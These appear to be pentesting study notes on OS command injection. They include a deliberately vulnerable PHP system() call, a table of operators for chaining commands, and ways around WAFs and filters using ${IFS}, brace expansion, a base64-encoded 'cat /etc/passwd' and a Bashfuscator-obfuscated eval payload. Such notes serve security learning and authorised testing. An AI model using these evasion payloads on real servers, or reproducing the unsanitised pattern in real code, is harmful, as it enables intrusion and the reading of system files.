Command Injections
Execute system commands on the back-end server
There are several type of injections found in web apps. The most common are:
| Injection | Description |
|---|---|
| OS Command Injection | User input is used as part of an OS command. |
| Code Injection | User input is used within a function that evaluates code. |
| SQL Injection | User input is used as part of an SQL query. |
| XSS/HTML Injection | User input is displayed on a web page. |
OS Command Injections
With OS command injections the user input must go into a web query that is executing system commands. Therefore look for function in programming languages that execute system commands.
PHP
web application written in PHP may use the exec, system, shell_exec, passthru, or pope .
<?php
if (isset($_GET['filename'])) {
system("touch /tmp/" . $_GET['filename'] . ".pdf");
}
?>Here touch is executed but without sanitation making it vulernable.
Detection
Finding out wether input is vulnerable for command injection
| Semicolon | ; |
%3b |
Both |
| New Line | \n |
%0a |
Both |
| Background | & |
%26 |
Both (second output generally shown first) |
| Pipe | \| |
%7c |
Both (only second output is shown) |
| AND | && |
%26%26 |
Both (only if first succeeds) |
| OR | \|\| |
%7c%7c |
Second (only if first fails) |
| Sub-Shell | `` |
%60%60 |
Both (Linux-only) |
| Sub-Shell | $() |
%24%28%29 |
Both (Linux-only) |
Bypassing Front-End validation
It can happen input is only validated on the front-end and not on the back-end. To bypass front-end validation we can url encode for example. We can use && to chain commands
ping -c 1 127.0.0.1 && whoamiOr use the OR (||) operator which only executes the second command if the first command fails to execute.
Other operators
| SQL Injection | ' , ; -- /* */ |
|---|---|
| Command Injection | ; && |
| LDAP Injection | * ( ) & \| |
| XPath Injection | ' or and not substring concat count |
| OS Command Injection | ; & \| |
| Code Injection | ' ; -- /* */ $() ${} #{} %{} ^ |
| Directory Traversal/File Path Traversal | ../ ..\\ %00 |
| Object Injection | ; & \| |
| XQuery Injection | ' ; -- /* */ |
| Shellcode Injection | \x \u %u %n |
| Header Injection | \r %0d %0a %09 |
Filter/WAF Detection
Web applications may use a WAF which has a list of blacklisted characters. Try various chars to see which are not blocked. For spaces filter: Spaces blacklisted can be bypassed various ways:
- Tabs = %09
- IFS = ${IFS}
- Brace expansions = {ls,-la} {% endhint %}
Other solution is to use path for / here.
echo ${PATH:0:1}
/Or a semcolon:
echo ${LS_COLORS:10:1}
;Or encode with base64
bash<<<$(base64 -d<<<Y2F0IC9ldGMvcGFzc3dkIHwgZ3JlcCAzMw==)We can utilize for obfuscating bash commands Bashfuscator.
$ /bashfuscator -c 'cat /etc/passwd' -s 1 -t 1 --no-mangling --layers 1
[+] Mutators used: Token/ForCode
[+] Payload:
eval "$(W0=(w \ t e c p s a \/ d);for Ll in 4 7 2 1 8 3 2 4 8 5 7 6 6 0 9;{ printf %s "${W0[$Ll]}";};)"
[+] Payload size: 104 characters